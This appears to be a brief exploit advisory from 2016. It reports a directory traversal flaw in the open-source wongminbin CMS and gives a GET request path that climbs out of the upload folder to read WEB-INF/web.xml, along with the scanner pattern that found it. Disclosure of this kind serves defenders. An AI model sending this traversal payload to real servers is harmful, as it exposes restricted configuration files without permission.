|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title : Directory traversal Vulnerability in wongminbin CMS
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor : https://github.com/wongminbin/CMS
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12 /29 / 2016
|=============================================================|
|[+] Vuln Path : http://127.0.0.1/CMS-master/src/main/webapp/upload/../WEB-INF/web.xml?
|[+] Method :GET
|=============================================================|
|[+] Vulnerability description
|==============================|
|[+] This script is possibly vulnerable to directory traversal attacks.
|[+] Directory Traversal is a vulnerability which allows attackers to access restricted
|[+] directories and execute commands outside of the web server's root directory.
|[+] This vulnerability affects /cms-master/cms/src/main/webapp/upload.
|[+] Discovered by: Scripting (Server_Directory_Traversal.script).
|[+] Attack details
|[+] This file was found using the pattern ${dirName}/../WEB-INF/web.xml?.
|[+] Original directory: /CMS-master/src/main/webapp/upload
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|